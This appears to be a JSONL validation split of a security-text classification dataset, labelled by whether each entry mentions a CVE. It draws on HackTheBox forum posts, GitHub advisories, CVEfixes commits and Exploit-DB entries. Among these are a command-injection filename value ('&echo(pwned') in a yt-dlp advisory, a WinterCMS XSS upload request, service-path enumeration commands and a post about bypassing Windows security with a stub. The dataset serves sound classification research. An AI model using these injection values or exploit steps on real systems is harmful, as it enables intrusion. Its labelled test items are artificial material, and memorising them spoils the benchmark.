+{"id": "ce7d4ee0b4afb5dfe563", "text": "Hello everybody , I’m stuck please help. I find access.log of nginix and can read it but when i want to use User agent it don’t add log . any hint ?", "source": "hackthebox", "timestamp": "2022-09-20", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0288a516b5ac72fc3fa5", "text": "Improper Access Control in Apache Tomcat\n\n[Severity: MEDIUM]\n\nThe replay-countermeasure functionality in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.36, 6.x before 6.0.36, and 7.x before 7.0.30 tracks cnonce (aka client nonce) values instead of nonce (aka server nonce) and nc (aka nonce-count) values, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, a different vulnerability than CVE-2011-1184.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "67b017813202d7a282ef", "text": "Here’s a free PDF , updated for 2021. Do you already have a firm grasp of Linux?", "source": "parrotsec", "timestamp": "2022-05-30", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "2e5e5f57fa63abf2a4dc", "text": "CVE: CVE-2022-31051\n\n[{'lang': 'en', 'value': 'semantic-release is an open source npm package for automated version management and package publishing. In affected versions secrets that would normally be masked by semantic-release can be accidentally disclosed if they contain characters that are excluded from uri encoding by `encodeURI`. Occurrence is further limited to execution contexts where push access to the related repository is not available without modifying the repository url to inject credentials. Users are advised to upgrade. Users unable to upgrade should ensure that secrets that do not contain characters that are excluded from encoding with `encodeURI` when included in a URL are already masked properly.'}]\n\nFix commit: fix(log-repo): use the original form of the repo url to remove the need to mask credentials (#2459)\n\nfixes #2449", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "2a3e7e2c7dba65750250", "text": " yt-dlp on Windows vulnerable to `--exec` command injection when using `%q`\n\n[Severity: HIGH]\n\n### Impact\n[`yt-dlp`](https://github.com/yt-dlp/yt-dlp) allows the user to provide shell commands to be executed at various stages in its download process through the `--exec` flag. This flag allows output template expansion in its argument, so that video metadata values may be used in the shell commands. The metadata fields can be combined with the `%q` conversion, which is intended to quote/escape these values so they can be safely passed to the shell.\n\nHowever, the escaping used for `cmd` (the shell used by Python's `subprocess` on Windows) did not properly escape special characters, which can allow for remote code execution if `--exec` is used directly with maliciously crafted remote data. This vulnerability only impacts `yt-dlp` on Windows, and the vulnerability is present regardless of whether `yt-dlp` is run from `cmd` or from `PowerShell`.\n\nSupport for output template expansion in `--exec`, along with this vulnerable behavior, was added to `yt-dlp` in version [2021.04.11](https://github.com/yt-dlp/yt-dlp/releases/tag/2021.04.11).\n\n```shell\n> yt-dlp https://youtu.be/Jo66yyCpHcQ --exec \"echo %(title)q\"\n[youtube] Extracting URL: https://youtu.be/Jo66yyCpHcQ\n[youtube] Jo66yyCpHcQ: Downloading webpage\n[youtube] Jo66yyCpHcQ: Downloading ios player API JSON\n[youtube] Jo66yyCpHcQ: Downloading android player API JSON\n[youtube] Jo66yyCpHcQ: Downloading m3u8 information\n[info] Jo66yyCpHcQ: Downloading 1 format(s): 135+251\n[download] Destination: "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f135.mp4\n[download] 100% of 4.85KiB in 00:00:00 at 60.20KiB/s\n[download] Destination: "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f251.webm\n[download] 100% of 4.80KiB in 00:00:00 at 31.58KiB/s\n[Merger] Merging formats into \""&echo(&echo(pwned&rem( [Jo66yyCpHcQ].mkv\"\nDeleting original file "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f135.mp4 (pass -k to keep)\nDeleting original file "&echo(&echo(pwned&rem( [Jo66yyCpHcQ].f251.webm (pass -k to keep)\n[Exec] Executing command: echo \"\\\"&echo(&echo(pwned&rem(\"\n\"\\\"\n\npwned\n```\n\n### Patches\nyt-dlp version 2023.09.24 fixes this issue by properly escaping each special character.\n`\\n` will be replaced by `\\r`, as no way of escaping it has been found.\n\n### Workarounds\nIt is recommended to upgrade yt-dlp to version 2023.09.24 as soon as possible. Also, always be careful when using `--exec`, because while this specific vulnerability has been patched, using unvalidated input in shell commands is inherently dangerous.\n\nFor Windows users who are not able to upgrade:\n- Avoid using any output template expansion in `--exec` other than `{}` (filepath).\n- If expansion in `--exec` is needed, verify the fields you are using do not contain `\"`, `|` or `&`.\n- Instead of using `--exec`, write the info json and load the fields from it instead.\n\n### References\n- https://github.com/yt-dlp/yt-dlp/security/advisories/GHSA-42h4-v29r-42qg\n- https://nvd.nist.gov/vuln/detail/CVE-2023-40581\n- https://github.com/yt-dlp/yt-dlp/releases/tag/2023.09.24\n- https://github.com/yt-dlp/yt-dlp-nightly-builds/releases/tag/2023.09.24.003044\n- https://github.com/yt-dlp/yt-dlp/commit/de015e930747165dbb8fcd360f8775fd973b7d6e", "source": "github_advisory", "timestamp": "2023-09-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "50836f2fffc19a56aa87", "text": "This topic was automatically closed 120 days after the last reply. New replies are no longer allowed.", "source": "parrotsec", "timestamp": "2022-02-15", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "03fb3165cb248fda2e53", "text": "CVE: CVE-2022-1650\n\n[{'lang': 'en', 'value': 'Exposure of Sensitive Information to an Unauthorized Actor in GitHub repository eventsource/eventsource prior to v2.0.2.'}]\n\nFix commit: fix: strip sensitive headers on redirect to different origin", "source": "cvefixes", "timestamp": "2022-05-12", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "03ba91e2889b315e3733", "text": "CVE: CVE-2020-28919\n\n[{'lang': 'en', 'value': 'A stored cross site scripting (XSS) vulnerability in Checkmk 1.6.0x prior to 1.6.0p19 allows an authenticated remote attacker to inject arbitrary JavaScript via a javascript: URL in a view title.'}]\n\nFix commit: Rewrite matching a href unescape regex to separate attributes\n\nThe goal of this commit is to separate the values of the href and target\nattributes in dedicated match groups. We also exclude the quotes from the\nmatch groups to simplify the code.\n\nChange-Id: I1e64946a1a426d81284b3173db43135ee0d1debc", "source": "cvefixes", "timestamp": "2022-01-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "cc55bd93744b8a5e0b98", "text": "Prototype Pollution in deep-get-set\n\n[Severity: HIGH]\n\nAll versions of package deep-get-set are vulnerable to Prototype Pollution via the 'deep' function. **Note:** This vulnerability derives from an incomplete fix of [CVE-2020-7715](https://security.snyk.io/vuln/SNYK-JS-DEEPGETSET-598666)", "source": "github_advisory", "timestamp": "2022-06-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "fe185edf64e5f97a86ed", "text": "Agreed I could use some help here, I’m pretty confident I have the right train of thought: user-anarchy for my usernames create a custom password list using CUPP Use hydra, honestly I don’t know jack about HP but the hint says don’t get crazy with CUPP buuuuuuuuut??? When I use the two lists together is says it’s going to take several hours and the machine times out. Am I going down the right track?", "source": "hackthebox", "timestamp": "2022-02-27", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "5dcc60238eef47f10d5c", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nA remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Microsoft Edge, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects Microsoft Edge, ChakraCore. This CVE ID is unique from CVE-2018-8391, CVE-2018-8456, CVE-2018-8457, CVE-2018-8459.", "source": "github_advisory", "timestamp": "2022-05-13", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c285e2e4702de7a4f6ee", "text": "Regarding global rank\n\nhey, i completed 2 machines in hackthebox and owned them and also completed 1 or 2 challanges why my global ranking is not increasing? its still 0", "source": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "6583e6f40e4bdf3c9992", "text": "I could need help as well. I found flag 4 and upgraded my Shell to a fully interactive shell. I also checked commands I can execute with sudo without password and tried to exploit the command. Is this the right way? I did not really find useful hints from the internet.", "source": "hackthebox", "timestamp": "2022-08-04", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c0a115287fc6fe4c28aa", "text": "Buildbot vulnerable to cross-site scripting\n\n[Severity: MEDIUM]\n\nMultiple cross-site scripting (XSS) vulnerabilities in Buildbot 0.7.6 through 0.7.11p2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors, different vulnerabilities than CVE-2009-2959.", "source": "github_advisory", "timestamp": "2022-05-02", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "ad75b4797772a770d6d2", "text": "ChakraCore RCE Vulnerability\n\n[Severity: HIGH]\n\nChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "source": "github_advisory", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5bfcc59494a327f4df92", "text": "CVE: CVE-2022-1723\n\n[{'lang': 'en', 'value': 'Server-Side Request Forgery (SSRF) in GitHub repository jgraph/drawio prior to 18.0.6.'}]\n\nFix commit: 18.0.6 release", "source": "cvefixes", "timestamp": "2022-05-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "0f326fab274a42f5bcc0", "text": "TYPO3 CMS vulnerable to Denial of Service in Page Error Handling\n\n[Severity: MEDIUM]\n\n> ### Meta\n> * CVSS: `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C` (5.5)\n\n### Problem\nRequesting invalid or non-existing resources via HTTP triggers the page error handler which again could retrieve content to be shown as an error message from another page. This leads to a scenario in which the application is calling itself recursively - amplifying the impact of the initial attack until the limits of the web server are exceeded.\n\nThis vulnerability is the same as described in [TYPO3-CORE-SA-2021-005](https://typo3.org/security/advisory/typo3-core-sa-2021-005) ([CVE-2021-21359](https://nvd.nist.gov/vuln/detail/CVE-2021-21359)). A regression, introduced during TYPO3 v11 development, led to this situation.\n\n### Solution\nUpdate to TYPO3 version 11.5.16 that fixes the problem described above.\n\n### Credits\nThanks to Rik Willems who reported this issue and to TYPO3 core & security team member Oliver Hader who fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2022-006](https://typo3.org/security/advisory/typo3-core-sa-2022-006)", "source": "github_advisory", "timestamp": "2022-09-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c71ad44499c761e53672", "text": "CVE: CVE-2022-30767\n\n[{'lang': 'en', 'value': 'nfs_lookup_reply in net/nfs.c in Das U-Boot through 2022.04 (and through 2022.07-rc2) has an unbounded memcpy with a failed length check, leading to a buffer overflow. NOTE: this issue exists because of an incorrect fix for CVE-2019-14196.'}]\n\nFix commit: CVE-2019-14196: nfs: fix unbounded memcpy with a failed length check at nfs_lookup_reply\n\nThis patch adds a check to rpc_pkt.u.reply.data at nfs_lookup_reply.\n\nSigned-off-by: Cheng Liu \nReported-by: Fermín Serna \nAcked-by: Joe Hershberger ", "source": "cvefixes", "timestamp": "2022-05-16", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "58d3c45b588b06418331", "text": "Thanks @akiraowen I was stuck on this question. I followed your leads: 1). Use cupp and specify First Name, Surname and accept the question for special characters, numbers and leet mode. 2). Reduce the list of passwords with “sed” as taught in the HTB Academy module. 3). Use the tool “usernameGenerator” with “Harry Potter”. I also tried the username-anarchy tool and it worked. 4). With “hydra” the attack lasts literally 20 seconds or less.", "source": "hackthebox", "timestamp": "2022-12-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0905a81b06c64b12b91f", "text": "I am on flag5. I moved to third user with a shell from external service where it is not upgraded. So, errors reported by shell are missing. Exist any way to fix this. I guess I am inside a restricted “universe” due my filesystem is different than other users. Any hint is welcome! thanks", "source": "hackthebox", "timestamp": "2022-03-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "72e750a26781a7f7e964", "text": "[Allocation of Resources Without Limits or Throttling] CVE-2022-32206: HTTP compression denial of service\n\ncurl supports \"chained\" HTTP compression algorithms, meaning that a server response can be compressed multiple times and potentially with different algorithms. The number of acceptable \"links\" in this \"decompression chain\" was unbounded, allowing a malicious server to insert a virtually unlimited number of compression steps.\n\nThe use of such a decompression chain could result in a \"malloc bomb\", making curl end up spending enormous amounts of allocated heap memory, or trying to and returning out of memory errors.\n\n## Impact\n\nDenial of service", "source": "hackerone", "timestamp": "2022-06-27", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "99e3b856a27f7bec6484", "text": "If I remember correctly I brute forced for FTP but if you’re using the right wordlist it’s will not take long at all I hope this helps but I can’t remember for sure the the service i brute forced", "source": "hackthebox", "timestamp": "2022-03-22", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c7b3cb5c398cf442f147", "text": "Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path\n\n# Exploit Title: Sherpa Connector Service v2020.2.20328.2050 - Unquoted Service Path\n# Exploit Author: Manthan Chhabra (netsectuna), Harshit (fumenoid)\n# Version: 2020.2.20328.2050\n# Date: 02/04/2022\n# Vendor Homepage: http://gimmal.com/\n# Vulnerability Type: Unquoted Service Path\n# Tested on: Windows 10\n# CVE: CVE-2022-23909\n\n\n# Step to discover Unquoted Service Path:\n\nC:\\>wmic service get name,displayname,pathname,startmode | findstr /i\n\"sherpa\" | findstr /i \"auto\" |findstr /i /v \"c:\\windows\\\\\" |findstr /i /v\n\"\"\"\n\nSherpa Connector Service\n Sherpa Connector Service C:\\Program\nFiles\\Sherpa Software\\Sherpa Connector\\SherpaConnectorService.exe\n Auto\n\nC:\\>sc qc \"Sherpa Connector Service\"\n\n[SC] QueryServiceConfig SUCCESS\n\nSERVICE_NAME: Sherpa Connector Service\n TYPE : 10 WIN32_OWN_PROCESS\n START_TYPE : 2 AUTO_START\n ERROR_CONTROL : 1 NORMAL\n BINARY_PATH_NAME : C:\\Program Files\\Sherpa Software\\Sherpa\nConnector\\SherpaConnectorService.exe\n LOAD_ORDER_GROUP :\n TAG : 0\n DISPLAY_NAME : Sherpa Connector Service\n DEPENDENCIES : wmiApSrv\n SERVICE_START_NAME : LocalSystem", "source": "exploitdb", "timestamp": "2022-04-07", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "64fe586edb7563cdf916", "text": "I found something here? gist.github.com https://gist.github.com/Bristools/7af6f8710837a5d8a3786059fce18e3a/revisions gistfile1.txt You'll need inno setup compiler and Winrar https://jrsoftware.org/isdl.php https://www.win-rar.com/start.html?&L=0 https://direct-link.net/323899/itroublve MAKE SURE TO TURN ON BYPASS WINDOWS SECURITY -------------------------------------------------- 1.)First create a stub using a stub maker of your choice. I recommend Mercurial 2.)Download inno setup compiler and create a new script file using the script wizard This file has been truncated. show original", "source": "hackersploit", "timestamp": "2022-12-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "89153b00e6c84df23de4", "text": "Locate hidden cameras and intercept video stream through router\n\nHello, I am currently facing an issue where I believe there are cameras hidden about my home. I would like some advice as to how I can: 1) Locate the cameras/ spy devices on through the router. 2) Intercept images being sent out by the cameras. (Would also help me locate them physically). 3) Find the IP that these images are being sent to. If anyone has any suggestions on programs/ methods that I could use to do this, it would be much appreciated.", "source": "go4expert", "timestamp": "2022-08-06", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "c9a3fac0f6dd7306a476", "text": "CVE: CVE-2022-1509\n\n[{'lang': 'en', 'value': 'Sed Injection Vulnerability in GitHub repository hestiacp/hestiacp prior to 1.5.12. An authenticated remote attacker with low privileges can execute arbitrary code under root context.'}]\n\nFix commit: [Security] Patches multiple security issue (#2555)\n\n* Add missing check in is_format_valid\r\n\r\n* Add check on v-delete-dns-domain\r\n\r\n* Validate theme via is_format_valid\r\n\r\n* No need for extra code\r\n\r\n* Prevent LF command passed trough + Add test to verify\r\n\r\n* Add missing checks\r\n\r\n* Don't allow exception for localhost\r\n\r\n* Add some more missing checks\r\n\r\n* Fix to strict error validation\r\n\r\n* Add validation for user\r\n\r\n* Fix bug in main.sh\r\n\r\n* Use -d instead -f", "source": "cvefixes", "timestamp": "2022-04-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "c6e1e70b09e063966b7c", "text": "CVE: CVE-2022-0253\n\n[{'lang': 'en', 'value': \"livehelperchat is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')\"}]\n\nFix commit: Do not execute angular title", "source": "cvefixes", "timestamp": "2022-01-17", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "1087810edbe10c53a87f", "text": "CVE: CVE-2022-24279\n\n[{'lang': 'en', 'value': 'The package madlib-object-utils before 0.1.8 are vulnerable to Prototype Pollution via the setValue method, as it allows an attacker to merge object prototypes into it. *Note:* This vulnerability derives from an incomplete fix of [CVE-2020-7701](https://security.snyk.io/vuln/SNYK-JS-MADLIBOBJECTUTILS-598676)'}]\n\nFix commit: fix(set-value): prototype pollution", "source": "cvefixes", "timestamp": "2022-04-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "50cad7ecf7222a5397ae", "text": "Hi can anyone DM on overflown, I already have the exploit working but Im not sure where to use it.", "source": "hackthebox", "timestamp": "2022-02-23", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "037160c70ddc6a6ba810", "text": "CVE: CVE-2022-23598\n\n[{'lang': 'en', 'value': 'laminas-form is a package for validating and displaying simple and complex forms. When rendering validation error messages via the `formElementErrors()` view helper shipped with laminas-form, many messages will contain the submitted value. However, in laminas-form prior to version 3.1.1, the value was not being escaped for HTML contexts, which could potentially lead to a reflected cross-site scripting attack. Versions 3.1.1 and above contain a patch to mitigate the vulnerability. A workaround is available. One may manually place code at the top of a view script where one calls the `formElementErrors()` view helper. More information about this workaround is available on the GitHub Security Advisory.'}]\n\nFix commit: Merge pull request from GHSA-jq4p-mq33-w375\n\nHtml escape validation error messages", "source": "cvefixes", "timestamp": "2022-01-28", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "5c59675ab3a1c920d8ad", "text": "WinterCMS < 1.2.3 - Persistent Cross-Site Scripting\n\n# Exploit Title: WinterCMS < 1.2.3 - Persistent Cross-Site Scripting\n# Exploit Author: abhishek morla\n# Google Dork: N/A\n# Date: 2023-07-10\n# Vendor Homepage: https://wintercms.com/\n# Software Link: https://github.com/wintercms/winter\n# Version: 1.2.2\n# Tested on: windows64bit / mozila firefox\n# CVE : CVE-2023-37269\n# Report Link : https://github.com/wintercms/winter/security/advisories/GHSA-wjw2-4j7j-6gc3\n# Video POC : https://youtu.be/Dqhq8rdrcqc\n\nTitle : Application is Vulnerable to Persistent Cross-Site Scripting via SVG File Upload in Custom Logo Upload Functionality\n\nDescription :\nWinterCMS < 1.2.3 lacks restrictions on uploading SVG files as website logos, making it vulnerable to a Persistent cross-site scripting (XSS) attack. This vulnerability arises from the ability of an attacker to embed malicious JavaScript content within an SVG file, which remains visible to all users, including anonymous visitors. Consequently, any user interaction with the affected page can inadvertently trigger the execution of the malicious script\n\nPayload:-\n// image.svg\n\n\n\n \n \n \n\n//Post Request\n\nPOST /backend/system/settings/update/winter/backend/branding HTTP/1.1\nHost: 172.17.0.2\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCache-Control: no-cache\nX-Requested-With: XMLHttpRequest\nX-CSRF-TOKEN: fk93d30vmHCawwgMlTRy97vPOxaf4iPphtUwioc2\nX-WINTER-REQUEST-HANDLER: formLogo::onUpload\nContent-Type: multipart/form-data; boundary=---------------------------186411693022341939203410401206\nContent-Length: 608\nOrigin: http://172.17.0.2\nConnection: close\nCookie: admin_auth=eyJpdiI6IkV2dElCcWdsZStzWHc5cDVIcFZ1bnc9PSIsInZhbHVlIjoiVFkyV1k3UnBKUVNhSWF2NjVNclVCdXRwNklDQlFmenZXU2hUNi91T3c5aFRTTTR3VWQrVVJkZG5pcFZTTm1IMzFtZzkyWWpRV0FYRnJuZ1VoWXQ0Q2VUTGRScHhVcVRZdWtlSGYxa1kyZTh0RXVScFdySmF1VDZyZ1p0T1pYYWI5M1ZmVWtXUkhpeXg2U0l3NG9ZWHhnPT0iLCJtYWMiOiIyNzk0OTNlOWY2ODZhYjFhMGY0M2Y4Mzk0NjViY2FiOWQ0ZjNjMThlOTkxODZjYmFmNTZkZmY3MmZhMTM3YWJlIiwidGFnIjoiIn0%3D; BBLANG=en_US; winter_session=eyJpdiI6ImJFWHVEb0QrTmo5YjZYcml6Wm1jT3c9PSIsInZhbHVlIjoiQVdVZ3R4ajVUWUZXeS83dkhIQVFhVVYxOE1uajJQOVNzOUtwM1ZGcUFYOC9haHZFMlE2R0llNjZDWVR6eHZqbDZ5Z1J1akM5VkNaQUFZM1p5OGlZcjJFWTRaT21tRWdtcnJUUHJWRWg1QTZyRFhJbEdMc0h1SzZqaEphMFFSSDYiLCJtYWMiOiI0YzRkNWQwODVkMmI4ZmMxMTJlMGU5YjM2MWJkYjNiNjEwZmE2NTY4ZGQwYTdjNjAxMjRkMjRiN2M1NTBiOTNiIiwidGFnIjoiIn0%3D\n\n-----------------------------186411693022341939203410401206\nContent-Disposition: form-data; name=\"file_data\"; filename=\"image.svg\"\nContent-Type: image/svg+xml\n\n\n\n\n \n \n \n\n-----------------------------186411693022341939203410401206--\n\n\n\n|-----------------------------------------EOF-----------------------------------------", "source": "exploitdb", "timestamp": "2023-07-15", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "dfbdea7ca43d37b5d3eb", "text": "CVE: CVE-2022-21670\n\n[{'lang': 'en', 'value': 'markdown-it is a Markdown parser. Prior to version 1.3.2, special patterns with length greater than 50 thousand characterss could slow down the parser significantly. Users should upgrade to version 12.3.2 to receive a patch. There are no known workarounds aside from upgrading.'}]\n\nFix commit: Fix possible ReDOS in newline rule.\n\nCo-authored-by: MakeNowJust ", "source": "cvefixes", "timestamp": "2022-01-10", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "546a37a44796d2e26bff", "text": "Don't overreact mobile machine\n\nhello can anyone tell me how find flag in the overreact mobile machine flag?", "source": "hackthebox", "timestamp": "2023-05-16", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "31e65eb23dfa782aa3ee", "text": "try out this command it’ll work $ netstat -ln4 | grep LISTEN | grep -v 127 | wc -l", "source": "hackthebox", "timestamp": "2022-02-10", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "0ceea414589178f60475", "text": "CVE: CVE-2022-24896\n\n[{'lang': 'en', 'value': 'Tuleap is a Free & Open Source Suite to manage software developments and collaboration. In versions prior to 13.7.99.239 Tuleap does not properly verify authorizations when displaying the content of tracker report renderer and chart widgets. Malicious users could use this vulnerability to retrieve the name of a tracker they cannot access as well as the name of the fields used in reports.'}]\n\nFix commit: request #26729 Tracker report renderer and chart widgets leak information user cannot access\n\nTracker report renderer and chart widgets leak information user cannot access\n\nChange-Id: Ibdd7d1b8e72dd44bbb2b747b7d8f264603f98024", "source": "cvefixes", "timestamp": "2022-06-09", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "be5e219db77a3ec7acea", "text": "CVE: CVE-2020-28471\n\n[{'lang': 'en', 'value': 'This affects the package properties-reader before 2.2.0.'}]\n\nFix commit: Test case covering the use of `__proto__` as a section name\nCloses #40", "source": "cvefixes", "timestamp": "2022-07-25", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "417b79b677cddee36085", "text": "TSplus 16.0.0.0 - Remote Work Insecure Files and Folders\n\n# Exploit Title: TSplus 16.0.0.0 - Remote Work Insecure Files and Folders Permissions\n# Date: 2023-08-09\n# Exploit Author: Carlo Di Dato for Deloitte Risk Advisory Italia\n# Vendor Homepage: https://tsplus.net/\n# Version: Up to 16.0.0.0\n# Tested on: Windows\n# CVE : CVE-2023-31068\n\nWith TSPlus Remote Work (v. 16.0.0.0) you can create a secure single\nsign-on web portal and remote desktop gateway that enables users to\nremotely access the console session of their office PC.\nThe solution comes with an embedded web server to allow remote users to\neasely connect remotely.\nHowever, insecure file and folder permissions are set, and this could\nallow a malicious user to manipulate file content (e.g.: changing the\ncode of html pages or js scripts) or change legitimate files (e.g.\nSetup-RemoteWork-Client.exe) in order to compromise a system or to gain\nelevated privileges.\n\nThis is the list of insecure files and folders with their respective\npermissions:\n\nPermission: Everyone:(OI)(CI)(F)\n\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\download\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\downloads\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\prints\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\var\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\remoteapp\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\downloads\\shared\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\js\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\jwres\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\locales\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\own\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\des\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\key\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\topmenu\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\imgs\\key\\parts\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\img\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\img\\cp\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\img\\srv\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\images\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\js\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\images\\bramus\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\java\\third\\js\\prototype\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\var\\log\n\n-------------------------------------------------------------------------------------------\n\nPermission: Everyone:(F)\n\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\robots.txt\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\hb.exe.config\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\SessionPrelaunch.Common.dll.config\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\cgi-bin\\remoteapp\\index.html\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\download\\common.js\nC:\\Program Files (x86)\\TSplus-RemoteWork\\Clients\\www\\download\\lang.js\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\download\\Setup-RemoteWork-Client.exe\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\jwres\\jwwebsockify.jar\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\jwres\\web.jar\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html5\\own\\exitlist.html\nC:\\Program Files\n(x86)\\TSplus-RemoteWork\\Clients\\www\\software\\html", "source": "exploitdb", "timestamp": "2023-08-21", "split": "val", "label": 1, "label_source": "cross_source_cve_mention"}
+{"id": "7a89388bb96e67b605d9", "text": "Something is wrong with this machine, port 9999 is not listening anymore. I started with this fortress a week ago, 9999 was up. But now it’s not. I just voted for the machine reset, it’s been rebooted, but it didn’t help.", "source": "hackthebox", "timestamp": "2023-02-11", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
+{"id": "4f488e73a09098d56147", "text": "hussain mujtaba said: ↑ You can use triple quotes to write multiline string or comments.Here is an example Code: string1=''' hello my name is python3 ''' Click to expand...", "source": "go4expert", "timestamp": "2023-12-08", "split": "val", "label": 0, "label_source": "cross_source_no_cve"}
